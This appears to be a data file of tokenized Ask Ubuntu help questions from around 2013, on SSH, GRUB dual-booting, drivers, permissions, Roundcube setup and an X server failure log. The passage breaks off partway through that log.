260485	why ca n't i allow access to port 22 on ubuntu 12.10 ?	i ca n't seem to figure out why port 22 will never let me ssh into my laptop . here 's what i 'm trying : ryan @ gigantic-laptop : ~ $ sudo ufw status status : active to action from -- -- -- -- -- -- 22 allow anywhere 22 allow anywhere ( v6 ) 22 allow out anywhere 22 allow out anywhere ( v6 ) ryan @ gigantic-laptop : ~ $ ssh localhost ssh : connect to host localhost port 22 : connection refused or if i try to disable : ryan @ gigantic-laptop : ~ $ sudo ufw disable firewall stopped and disabled on system startup ryan @ gigantic-laptop : ~ $ sudo ufw status status : inactive ryan @ gigantic-laptop : ~ $ ssh localhost ssh : connect to host localhost port 22 : connection refused ryan @ gigantic-laptop : ~ $ ssh 127.0.0.1 ssh : connect to host 127.0.0.1 port 22 : connection refused ryan @ gigantic-laptop : ~ $ sudo nmap 127.0.0.1 starting nmap 6.00 ( http : //nmap.org ) at 2013-02-23 18:14 pst nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000016s latency ) . not shown : 999 closed ports port state service 631/tcp open ipp nmap done : 1 ip address ( 1 host up ) scanned in 0.09 seconds what am i doing wrong ?
260487	my huawei modem e303c isnt getting detected in ubuntu 12.04	i tried to install the mobile partner linux edition & the installation did install the ndis driver . now when the next part comes up of entering the pppconfig , there i’ve set up an airtel connection and it requires the isp username and isp password which i don’t have . so the connection is incomplete . now if i enter lsusb in the terminal , i don’t find anything related to huawei modem device . all i find is bus 001 device 002 : id 0c45:63f2 microdia the device is n't detected after installing the driver too . please help .
260489	ubuntu one 4.1.91 on windows 7 through proxy—supposed to work ?	i 'm trying to set up ubuntu one 4.1.91 on my windows 7 box at work , but it gets stuck at 'getting information , please wait ... ' stage of single sign-on . unfortunately , i have to go through a proxy server . from reading posts in this forum and others , i gather that to configure a proxy for ubuntu one , one should go to windows ' internet properties dialogue → connections tab → lan settings , untick 'use automatic configuration script ' and set the proxy server manually . i entered some server proxy details that i found in our proxy.pac file , which work for other clients like git . i selected 'quit ' from ubuntu one in the system tray after setting that up , and killed the remaining ubuntu processes in the task manager . when i restarted ubuntu one , it asked me for my credentials for the proxy server . it did n't complain about them , but when i entered my ubuntu one credentials , sso still would n't work . i 've tried looking for log files to see exactly what 's going on , but have n't found any . i used 'search programs and files ' in the start menu to search for syncdameon.log but it did n't find such a file , although i 'm not a windows expert so i do n't know if i need to change any settings for that to work . i also looked around my ubuntu one installation directory , but no files have recent timestamps , even though it seems to have saved my proxy server login credentials somewhere . my questions : is ubuntu one supposed to work through an authenticated proxy server under windows 7 ? where can i look for clues for what 's going wrong ? what else should i try ? thanks , michael scheper .
260491	is it possible to change the group of a file if i am not part of that group ?	is it possible to use chgrp or chown to change a file 's group to one that i as the owner am not a part of ? i own the file , but i am not part of the group that i want to change it to , so can it be done without using sudo ?
260492	does updating the system consume extra space ?	i wonder if updating my system as suggested by the update manager consumes extra space ? because even after installing all software i would like to use , i had about 10 gb free space . now , without my knowledge , i have only 6gb free space . do i need to keep clearing temp folder contents like we do in windows ? if i need to delete , how do i do so ? any suggestions ?
260499	how do i access `` applications '' ?	okay , i 'll just go ahead and be stupid . i want to disable image checksum in brasero , and i have found a few instructions like this : http : //ubuntugenius.wordpress.com/2010/11/15/disable-annoying-creating-image-checksum-in-brasero-after-ubuntu-10-10-upgrade/ which tell me to go to applications > brasero ( etc. ) . i ... do n't know how to go to applications . so far , everything i 've done in ubuntu either works via the terminal or via the ubuntu main menu ( the power on/off button on the top right of the screen which gives me access to startup applications but not much else ) . how do i access this applications menu as referenced in the above ?
260503	unable to boot 12.10 amd64 live usb on gt5436e	this is my hardware http : //support.gateway.com/s/pc/r/1009521/1009521sp3.shtml i have refurbished the system with more ram ( 3gb total now ) and a new cpu ( core2duo e2700 2x2.53ghz ) when i try and boot the live usb of ubuntu 12.10 amd64 i get the boot loader menu but when i press enter to boot from live usb , the system beeps and nothing happens . i can keep pressing enter but it just keeps beeping . i have reflashed the bios to the most recent version for the chipset . is there some option i have n't enabled perhaps ? what could it be ? i am running 12.10 32bit with no issues .
260504	how to solve unmet dependencies when installing nvidia drivers ?	i keep getting this error when i try running sudo apt-get install nvidia-current : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-current : depends : xorg-video-abi-11 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) e : unable to correct problems , you have held broken packages . how do i fix this ?
260508	setting up home folders for users for 12.04 server edition -ls : can not open directory . : permission denied	i created an instance to run on a cloud service . the machine image was 12.04 server edition x64 . upon initially logging in and creating a user and su'ing into that user it does n't have a home folder : root @ chrisjlee : ~ # useradd -g www-data me root @ chrisjlee : ~ # su me $ ls ls : can not open directory . : permission denied $ cd ~ sh : 2 : cd : ca n't cd to /home/me $ do i have to initialize something in order for home folders to be automatically created ?
260510	how do i turn on workspaces ? ( why do i only have one workspace ? )	it appears that unity on raring only comes with a single virtual desktop ( aka workspaces ) by default , and ccsm 's wall plugin has no way to add more . is this configurable at all ?
260528	games for 2 players on same laptop ?	i only have 1 laptop , and want to play with another person . no joystick/mouse/anything . what games can i use ? as per meta : do n't add a new answer , but edit the community wiki answer . requirements : fun with two players enjoyable without spending an hour learning the rules free , open source is ideal usable offline , no flash-based nor online-based games . link to ubuntu package appreciated two-players-at-one-keyboard or hotseat or anything else ok
260531	ubuntu 12.04 & grub on macbook	several months ago i installed ubuntu in an external 500mb usb disk ( and on an old macbook4,1 ) . with a gpt partition table and partitioned as following : swap swap an unique ext4 partition for ubuntu one ntfs partition for datas everything worked fine with grub on sda ( a 500mb disk with standard osx installation and partitions ) . some days ago i installed another distro in another usb disk , also with gpt : a couple ntfs partitions swap swap unformatted 12 mb flagged as bios_grub root var home and installed this grub in the external disk . both installations does not rely on efi to boot . when i tried to boot the new installation a message always complained about the lack of the other partition ( ubuntu ) so i did a backup and cleared the mbr . sudo dd if=/dev/zero of=/dev/sda bs=446 count=1 short story , after clearing ( and also after restoring ) the mbr i am not anymore able to boot ubuntu and when trying to reinstall grub from the live cd i get the following message : /usr/bin/grub-setup : warn : this gpt partition label has no bios boot partition , embedding wo n't be possible . /usr/bin/grub-setup : error : embedding is not possible , but this is required fro cross-disk install . well , how grub installed originally at ubuntu installation time ? there is something different from grub-install procedure ? both ubuntu ( i 've installed a grub also in it ) and the other distro boot fine on another computer , but after reading a lot of posts here and there nothing worked for me and i am really confused : how can i restore the grub and let both disk to boot ? without to say that i am afraid that trying the efi way would produce nasty effects .
260532	ubuntu phone os developer preview	can this new ubuntu phone os developer preview be installed on my htc desire ( bravo ) ? or is it strictly for nexus devices ?
260533	not sure if it 's ubuntu , or my wifi or probably both ?	i 'm using an acer aspire one net book and i have windows 7 ultimate and ubuntu dual booted . processor : 1.66 ghz 1 gb ram intel atom 64 bit i noticed that in ubuntu , web sites do n't display well . while windows 7 does it just fine . this happens in all browsers . i have ubuntu-restricted-extras installed . my question is.. do i need to configure or install something to fix this ? note : i also experienced this sort of problem on linux mint and linux chakra more information : when i access somebody elses wifi.. about..all websites display normally
260534	installing ubuntu on a formatted ntfs drive	i am supposed to fix a laptop in which the hard disk was recently formatted . it contained windows 7 before . i am trying a fresh install of ubuntu 12.04 from a bootable usb , but have n't been able to go past the maintenance shell . in the maintenance shell , i tried out the following : root @ ubuntu : ~ # ntfsfix -b -d /dev/sda failed to determine whether /dev/sda is mounted : no such file or directory mounting volume ... ntfs signature is missing . failed attempting to correct errors ... ntfs signature is missing/ failed failed to startup volume : invalid argument ntfs signature is missing . trying the alternate boot sector unrecoverable error volume is corrupt . you should run chkdsk the trouble may be that there are n't permissions to write on the ntfs partition . the partition might not be corrupt . when i check the filesystem , i get this : root @ ubuntu : ~ # fsck /dev/sda fsck from util-linux 2.20.1 ext2fs_check_if_mount : ca n't check if mounted due to missing mtab file while determining whether /dev/sda is mounted . bad magic number in super-block the superblock could not be read or does not describe a correct ext2 filesystem . so , it must be an ntfs file system . that 's why i tried ntfsfix but that did n't work . the hard disk is not partitioned . when i run fdisk -l it shows /dev/sda ( ~500 gb ) and /dev/sdb ( boot recovery ) . i have been trying to run badblocks -v /dev/sda but , suddenly the laptop just reboots and i do n't even get to the maintenance shell stage . i select `` install ubuntu '' and it gets stuck at the wait screen forever . please help !
260535	i want to get rid of ubuntu and boot my windows 8 partition	i 've installed ubuntu many times but since i purchased a new laptop ( lenovo y580 ) i wanted to try ubuntu 12.10 amd64 on it . so , without knowing what was uefi nor gpt i installed it and everything was fine until i tryed to boot windows . i did make a partition for ubuntu without even touching all of the other ones , i can browse them in ubuntu but i ca n't boot the important one , only recovery and such but they do n't seem to fix it ( automatic recovery from windows ) so i do n't have any image to recover from and i have tryed everything from cmd aswell . i need to boot up that partition in dev/sda5 to make an image backup or something to get it back to default settings since i have all the partitions intact . gdisk ( p command ) disk /dev/sda : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 05ddaadb-baed-46de-94fd-ad3b74a521d9 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 2048-sector boundaries total free space is 3437 sectors ( 1.7 mib ) number start ( sector ) end ( sector ) size code name 1 2048 2050047 1000.0 mib 2700 basic data partition 2 2050048 2582527 260.0 mib ef00 efi system partition 3 2582528 4630527 1000.0 mib ffff basic data partition 4 4630528 4892671 128.0 mib 0c01 microsoft reserved part 5 4892672 1859151871 884.2 gib ef00 basic data partition 6 1859151872 1911580671 25.0 gib 0700 basic data partition 7 1911580672 1953523711 20.0 gib 2700 basic data partition and boot-repair log http : //paste.ubuntu.com/5560680
260537	how do i recover files from an ubuntu partition for which i am not the `` owner '' ?	good day , i 've recently experienced an odd problem where for reasons that escape me my graphics configuration has been corrupted . i 've tried going through the menu option that i am offered ( everything from starting in low graphics mode to using console , etc ... ) but i ca n't get to the files i want to recover . what does this have to do with permissions ? well , after getting tired of fiddling with this i decided to boot up ubuntu on a usb stick and try to access my files on my main ubuntu partition . success was had and i could clearly see all the stuff i wanted to recover still there . the problem is that i ca n't access any of my files because i 'm warned that i am not the `` owner '' of said files . howe could i go about giving myself ownership and just copying the files i 'm looking for onto my usb stick ? is there a way to fix my corrupted graphics configuration ? my main desire is to simply recover the important files i need and start a new ubuntu install from scratch . any help would be much appreciated . cheers .
260538	the `` resolv.conf '' file becomes empty after each restart	the `` /etc/resolv.conf '' file becomes empty after each restart and i lose the dns data set in it . it only contains the following text each time : # generated by networkmanager what should i do ?
260553	grub customizer does not start	i recently installed ubuntu 12.10 as a second os dual-booting with windows . and by default i need to boot to windows . so , i decided to install grub customizer through the terminal : sudo add-apt-repository ppa : danielrichter2007/grub-customizer sudo apt-get update sudo apt-get install grub-customizer but when i try to run grub customizer , a form appears for a password . after entering the password , nothing happens . what to do ?
260558	how to adjust brightness in games with radeon driver ?	i recently installed lubuntu 12.10 on an older laptop , an hp pavilion zv6000 . it runs great with one exception . i am unable to adjust the brightness in any games . i realize i am stuck using the open source radeon driver with this card , the mobility radeon xpress 200mm but i was wondering if there was any way to get it so i can adjust brightness in games . i really wish companies would support their older hardware better as older hardware can benefit the most from lubuntu . any help is appreciated , i do n't want to have to go back to xp , but i do like playing low-spec games like openarena on this machine !
260559	how to get a webapp request for facebook and gmail in chromium ?	i can not get a webapp request for facebook or gmail at all . i do not have these websites in the exceptions list in the chromium settings menu . i did everything i could to have the notification pop up and it works for tumblr and other sites with integration features but not for facebook and gmail specifically . i even have a youtube webapp . how to resolve this ?
260561	my program needs a other program	for my program i need android-tools-adb . how can i include this in my debian package ? or is there an other way to handle this problem ? i remember that rhythmbox asked you an question if you want to install the mp3 codex on first installation on ubuntu . how can i handle this question in pygtk ?
260562	ubuntu 12.10 wireless problem ; only showing me bluetooth option	my laptop is dell inspiron 15r . i have installed ubuntu 12.10 a week ago , and realized that the option for wireless is not there . not even in the network settings , so i went through the problems posted earlier and i thought its because of broadcom . so i tried : sudo apt-get update sudo apt-get install b43-fwcutter but still the wifi is not working . when i typed rfkill list all in the terminal i got the following output ... 0 : hci0 : bluetooth soft blocked : yes hard blocked : no it 's showing me only bluetooth and nothing about wireless . i guess wireless is blocked somewhere . please help ...
260563	unable to use external hard drive ( ntfs formatted )	i installed lubuntu 12.10 earlier today on an old machine i have lying around . i 've never really used this variation of ubuntu before and was hoping i could get some ( straightforward ) steps on how to fix my issue . i have a 2tb external hard drive which has all my media files stored on it . it is ntfs formatted . i have installed plex media server on the machine - it 's only true purpose to be honest - but plex wo n't detect any of the files within the folders on the external hard drive . i was told this is because of a permissions issue but i 'm not quite clear on what i should type in terminal . the external hard drive is called 'external ' and my username on this machine is 'manu ' . can someone help me understand how exactly to change the permissions on this hard drive please ? i need to share the drive on my home network so the other computers can read/write to it as well .
260564	facebook advertisements open automatically even when the browser is not currently open	i tried to google the problem for a while and still could n't find the solution . my browser periodically open a new tab with a facebook link even when the browser is not opening . first i guess that 's because of firefox , so i reinstalled firefox ( keeping the profile ) . not thing changed . now i need your helps . also , i 'm not sure the link is an ad or not but it 's does n't matter much , it 's annoying anyway . -- -- -- -- -- -update -- -- -- -- -- -- - remove firefox - > not worked dump the profile - > not worked the problem disappeared by itself . not sure how..
260570	how can i see which set of backups déjà-dup has already saved ?	i 've been using déjà-dup for a while with good moments and bad moments ( backup failed to complete for some unknown reason , there is already a bug report for this ) . so , i would like to check which sets of backup i have already successfully made , which files are included , when they were saved ( it would be great to be able to see each single version of the file , but i 'd be quite happy to see which date is latest successful backed up version ) . is there a tool that could help ?
260571	installing roundcube web server , gave date and time error while checking php configuration	installing roundcube web server , gave date and time error while checking php configuration . i am trying to configure the webamil using roundcube . below is the details . pop / smtp service is working fine on my mail server . able to send and receive mails through the mail client perfectly fine . using plain text authentication . ssl or tls is not used in mail server . roundcube version : roundcubemail-0.8.5 php version : php 5.3.10 need to set timezone settings to asia/kolkata i have checked this link and on thing i could understand out of it is that i need to modify the php.ini/.htaccess or just /.htaccess but could not find the /.htaccess in the installation folder of roundcube second i could find the php.ini/.htaccess @ /usr/local/lib/php.ini ... where i already modified it to date.timezone = `` asia/kolkata '' and restarted appache2 service still roundcube installation page shows below error . below is the complete page with the error in bold : roundcube webmail installer check environmentcreate configtest config checking php version version : ok ( php 5.3.10-1ubuntu3.5 detected ) checking php extensions the following modules/extensions are required to run roundcube : pcre : ok dom : ok session : ok xml : ok json : ok the next couple of extensions are optional and recommended to get the best performance : fileinfo : ok libiconv : ok multibyte : ok openssl : ok mcrypt : ok intl : ok exif : ok checking available databases check which of the supported extensions are installed . at least one of them is required . mysql : ok mysqli : ok postgresql : not available ( not installed ) sqlite ( v2 ) : not available ( not installed ) check for required 3rd party libs this also checks if the include path is set correctly . pear : ok mdb2 : ok net_smtp : ok net_idna2 : ok mail_mime : ok checking php.ini/.htaccess settings the following settings are required to run roundcube : file_uploads : ok session.auto_start : ok zend.ze1_compatibility_mode : ok mbstring.func_overload : ok suhosin.session.encrypt : ok magic_quotes_runtime : ok magic_quotes_sybase : ok *date.timezone : not ok ( empty value detected ) * the following settings are optional and recommended : allow_url_fopen : ok sorry but your webserver does not meet the requirements for roundcube ! please install the missing modules or fix the php.ini settings according to the above check results . hint : only checks showing not ok need to be fixed . installer by the roundcube dev team . copyright âš 2008-2012 â published under the gnu public license ; icons by famfamfam`
260572	how to work on the asp.net in ubuntu ?	i want to work on the asp.net in ubuntu . i use mono but it lack some of the features . it does n't have the toolbar and not any designing tools . please help .
260578	unity dashboard does not start on desktop	if i 've focused any application or my mouse is over launcher or top panel , dashboard works just fine . but when my mouse is on the desktop background , dashboard does not show on super-key-tap . what i 've tried : unity -- replace - no result disable wallch - no result changing wallpapers manually - no result logging off - no result rebooting whole system - no result this is second time i 've experienced such a problem , last time i had to reinstall my whole system , but it was when i was tweaking the nvidia drivers . running on ubuntu 12.10 64 bit with nvidia geforce 635m on unity de .
260579	grub2 menu problems with dualboot w7-ubuntu 11.10	i 'm starting up with linux and having loads of issues . already tried to find answers here , but ca n't make anything out of them . i installed ubuntu ( 64 bit version ) on a partition of my w7 hhd and created a swap too , but w7 keeps on booting straight away . i do not get any grub2 menu . as i do not have a cd device , i am using usb for everything . i tried several things that i found here to fix it ( besides right shift and esc repeatedly ) : try ubuntu without installing ( after being installed ) would not let me click on anything . burn a live-cd on my usb , open a terminal and use : sudo add-apt-repository ppa : yannubuntu/boot-repair but it will say `` command does not exist '' . besides , it does not appear to recognize ubuntu 's installation . when i tried to use : sudo install-grub the system gives me a message saying if i 'm sure if /dev is installed . burn a boot-repair usb and run it , but it says that i need internet access to complete the operation and repair grub2 , and as i do not have a lan connection i canâ´t do it either . i also tried reinstalling and updating ubuntu , downloading another iso just in case , but with similar results . any advice will be highly appreciated . i have extracted the boot-repair info file , in case it helps for this issue .
260580	ubuntu installer did n't ask which drive to install to	i tried installing ubuntu 12.10 to my windows desktop for a dual boot system . i used yumi so i could install it from a flash drive . my problem is that the installer never asked which drive i wanted to install to . after asking about my language , time zone , and keyboard , it just started copying files . i freaked out when i heard it thrashing my hard drive - i thought it was overwriting my copy of windows , so i forced my computer to shut down while it was working . after rebooting back into windows , i see that it deleted everything on my d drive ( storage and backup drive ) and was apparently installing ubuntu onto it . i lost a lot of stuff because the installer never asked where i wanted to install ubuntu ( i have multiple hard drives and partitions ) . how can i get the installer to check with me before deciding for itself where it 's going to install ?
260587	program for managing `` profiles '' ( home , work ... )	i 'm looking for a program that manage profiles for system settings like network , displays , mouse , power etc . for example : one profile for work to enable new proxy settings , setting brightness and turn bluetooth on . another profile for home , to enable wireless , disabling the proxy settings and so on . any ideas ?
260588	what apps to remove from startup to make ubuntu boot faster ?	i have two big problems with my laptop , that one of them i want to ask here and it is about boot time latency . my laptop boots really slowly . witch app is necessary to remain and witch one can be removed from startup using bum ?
260589	ubuntu 12.10 guest on server 2012 and hyper-v integration component 's	i have installed ubuntu 12.10 x64 as guest vm on server 2012 , and want to upgrade kernel to linux 3.8 linux 3.8 have balloon driver for dynamic memory and new ic i assume ... before upgrade , mouse working , but after upgrade using generic kernel 3.8 mouse does n't work and no hv_timesource , hv_ballon driver present i 'm tried to install kernel from source enabling all hyper-v component 's with no luck . config with 2 virtual cpu . cpu 2 always under 100 % load ! does not support smp ? how to install kernel 3.8 from source on ubuntu 12.10 ? how to enable all hyper-v modules ? p.s . sorry for my english update : installed kernel 3.8 with hyper-v support from = v.s.cz/linuxhyperv.php = but still want to compile my own custom kernel with ubuntu patches
260590	ubuntu package download	i am trying to get familiar with the ubuntu package page . my mac mini is currently offline since i dont get my network to work and i have read on forums how to download and install new ethernet driver for my mac mini . however when i try to install the drivers the `` make '' command is not working and i get `` error 2 '' i goggled around for the error and saw a post that said i need the following packages build-essential , linux-headers , linux-source , etc i installed ubuntu 12.10 with a usb stick and it seems almost no packages followed . i went in to [ http : //packages.ubuntu.com/source/quantal ] and found some of them . when i tried to install them i got that dependency is not satisfiable and tried to locate all the dependency files but it ended up that its like 100 of them . where can i get a `` full '' packages that contains all this files i need ? i also tried to install keryx but that one also demanded many dependency files so i feel like im running around in circles : ) is there some places for newbees like me to start ? right now im on a windows pc and i use a usb stick to move all the files around so i guess im asking how to get all the files and dependency i need in 1 go .
260594	pdbedit failed during openldap user creation with samba support	i am running lucid . i have setup openldap and samba a while ago , this problem existed since then and i still do n't know how to fix it . i use webmin 's ldap client to create a `` testuser '' account , and get following error : failed to save user : /usr/bin/pdbedit failed : pdb_set_user_sid_from_string : -21020 is n't a valid sid ! init_sam_from_ldap : no sambasid or sambasid attribute found for this user atest ldapsam_getsampwnam : init_sam_from_ldap failed for user 'testuser ' ! ldapsam_add_sam_account : user 'testuser ' already in the base , with samba attributes i think samba and openldap integration is not working corectly . even with above error , `` testuser '' account is created . i can login with this account via ssh , but i ca n't login to samba server on the same server . the last line of the error indicates some configuration is overlapped , but i do n't know where and how to fix it . update : here is samba setting section in ldap users and groups configuration page of webmin : and samba version 3.4.7 ldap protocol version 3 update 2 : the error disappeared after i copied and pasted the sambaid for the samba server from `` ldap client - > ldap browser '' . so the input for `` domain sid for samba3 '' looks something like : s-1-5-22-3845707085-2256048510-3517135715 . now samba user is created , but i still ca n't login to the samba server . the problem now is with password sync .
260598	12.10 problem - no access to programs	just updated my 12.04 to 12.10 , my dell latitude 630 laptop and everything is ok. next my gigabyte desktop and oops , i see no icons , no way to open terminal - can open file browser , new docs with libreoffice and even firefox - but not the ubuntu programs nor the terminal . pressing the meta-key ( or what it is called , windows-key on my keyboard ) renders nothing . i do not have ubuntu bootdisk ( updated via updatemanager ) - what can i do ? i am a bit in the country so i can not walk into the next shop ... tried to burn a new 12.10 bootdisk from the net , but no success . is there a way to do something without the terminal or could i possibly open the terminal manually ( finding the program ) ?
260602	fatal server errors , no screens found	i am an issue with my ubuntu box : i get the following error message when i do a startx : fatal server errors , no screens found when i start my computer , i do hear the ubuntu sound indicating the system is awaiting for a user session to be opened but the screen is black ... what is more i ca n't find anything relevant in the xorg.0.log ... i have copied it here : xorg.0.log : [ 77.084 ] x.org x server 1.11.3 release date : 2011-12-16 [ 77.084 ] x protocol version 11 , revision 0 [ 77.084 ] build operating system : linux 2.6.42-34-generic x86_64 ubuntu [ 77.084 ] current operating system : linux alpha 3.2.0-38-generic # 61-ubuntu smp tue feb 19 12:18:21 utc 2013 x86_64 [ 77.085 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-38-generic root=uuid=3501b573-9d6b-4ef2-bfec-fdf79842cf61 ro recovery nomodeset [ 77.085 ] build date : 17 january 2013 06:14:10am [ 77.085 ] xorg-server 2:1.11.4-0ubuntu10.11 ( for technical support please see http : //www.ubuntu.com/support ) [ 77.085 ] current version of pixman : 0.24.4 [ 77.085 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 77.085 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 77.086 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat feb 23 19:26:56 2013 [ 77.099 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 77.099 ] ( == ) no layout section . using the first screen section . [ 77.099 ] ( == ) no screen section available . using defaults . [ 77.099 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 77.099 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 77.099 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 77.099 ] ( == ) automatically adding devices [ 77.099 ] ( == ) automatically enabling devices [ 77.099 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 77.099 ] entry deleted from font path . [ 77.099 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 77.099 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 77.099 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 77.099 ] ( ii ) loader magic : 0x7f259f2c8b00 [ 77.099 ] ( ii ) module abi versions : [ 77.099 ] x.org ansi c emulation : 0.4 [ 77.099 ] x.org video driver : 11.0 [ 77.099 ] x.org xinput driver : 16.0 [ 77.099 ] x.org server extension : 6.0 [ 77.103 ] ( -- ) pci : * ( 0:7:0:0 ) 10de:0165:10de:0334 rev 161 , mem @ 0xfa000000/16777216 , 0xd0000000/268435456 , 0xfb000000/16777216 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 77.103 ] ( ww ) open acpi failed ( /var/run/acpid.socket ) ( no such file or directory ) [ 77.103 ] ( ii ) loadmodule : `` extmod '' [ 77.103 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 77.103 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 77.103 ] compiled for 1.11.3 , module version = 1.0.0 [ 77.103 ] module class : x.org server extension [ 77.103 ] abi class : x.org server extension , version 6.0 [ 77.103 ] ( ii ) loading extension mit-screen-saver [ 77.103 ] ( ii ) loading extension xfree86-vidmodeextension [ 77.103 ] ( ii ) loading extension xfree86-dga [ 77.103 ] ( ii ) loading extension dpms [ 77.103 ] ( ii ) loading extension xvideo [ 77.103 ] ( ii ) loading extension xvideo-motioncompensation [ 77.103 ] ( ii ) loading extension x-resource [ 77.103 ] ( ii ) loadmodule : `` dbe '' [ 77.104 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 77.104 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 77.104 ] compiled for 1.11.3 , module version = 1.0.0 [ 77.104 ] module class : x.org server extension [ 77.104 ] abi class : x.org server extension , version 6.0 [ 77.104 ] ( ii ) loading extension double-buffer [ 77.104 ] ( ii ) loadmodule : `` glx '' [ 77.104 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 77.120 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 77.120 ] compiled for 4.0.2 , module version = 1.0.0 [ 77.120 ] module class : x.org server extension [ 77.120 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:57:38 pdt 2012 [ 77.120 ] ( ii ) loading extension glx [ 77.120 ] ( ii ) loadmodule : `` record '' [ 77.120 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 77.120 ] ( ii ) module record : vendor= '' x.org foundation '' [ 77.120 ] compiled for 1.11.3 , module version = 1.13.0 [ 77.120 ] module class : x.org server extension [ 77.120 ] abi class : x.org server extension , version 6.0 [ 77.120 ] ( ii ) loading extension record [ 77.120 ] ( ii ) loadmodule : `` dri '' [ 77.121 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 77.121 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 77.121 ] compiled for 1.11.3 , module version = 1.0.0 [ 77.121 ] abi class : x.org server extension , version 6.0 [ 77.121 ] ( ii ) loading extension xfree86-dri [ 77.121 ] ( ii ) loadmodule : `` dri2 '' [ 77.121 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 77.121 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 77.121 ] compiled for 1.11.3 , module version = 1.2.0 [ 77.121 ] abi class : x.org server extension , version 6.0 [ 77.121 ] ( ii ) loading extension dri2 [ 77.121 ] ( == ) matched nvidia as autoconfigured driver 0 [ 77.121 ] ( == ) matched nouveau as autoconfigured driver 1 [ 77.121 ] ( == ) matched nv as autoconfigured driver 2 [ 77.121 ] ( == ) matched vesa as autoconfigured driver 3 [ 77.121 ] ( == ) matched fbdev as autoconfigured driver 4 [ 77.121 ] ( == ) assigned the driver to the xf86configlayout [ 77.121 ] ( ii ) loadmodule : `` nvidia '' [ 77.121 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 77.206 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 77.206 ] compiled for 4.0.2 , module version = 1.0.0 [ 77.206 ] module class : x.org video driver [ 77.231 ] ( ii ) loadmodule : `` nouveau '' [ 77.231 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 77.244 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 77.244 ] compiled for 1.11.3 , module version = 0.0.16 [ 77.244 ] module class : x.org video driver [ 77.244 ] abi class : x.org video driver , version 11.0 [ 77.244 ] ( ii ) loadmodule : `` nv '' [ 77.244 ] ( ww ) warning , could n't open module nv [ 77.244 ] ( ii ) unloadmodule : `` nv '' [ 77.244 ] ( ii ) unloading nv [ 77.244 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 77.244 ] ( ii ) loadmodule : `` vesa '' [ 77.244 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 77.244 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 77.244 ] compiled for 1.11.3 , module version = 2.3.0 [ 77.244 ] module class : x.org video driver [ 77.244 ] abi class : x.org video driver , version 11.0 [ 77.244 ] ( ii ) loadmodule : `` fbdev '' [ 77.245 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 77.254 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 77.254 ] compiled for 1.11.3 , module version = 0.4.2 [ 77.254 ] abi class : x.org video driver , version 11.0 [ 77.254 ] ( == ) matched nvidia as autoconfigured driver 0 [ 77.254 ] ( == ) matched nouveau as autoconfigured driver 1 [ 77.254 ] ( == ) matched nv as autoconfigured driver 2 [ 77.254 ] ( == ) matched vesa as autoconfigured driver 3 [ 77.254 ] ( == ) matched fbdev as autoconfigured driver 4 [ 77.254 ] ( == ) assigned the driver to the xf86configlayout [ 77.254 ] ( ii ) loadmodule : `` nvidia '' [ 77.254 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 77.254 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 77.254 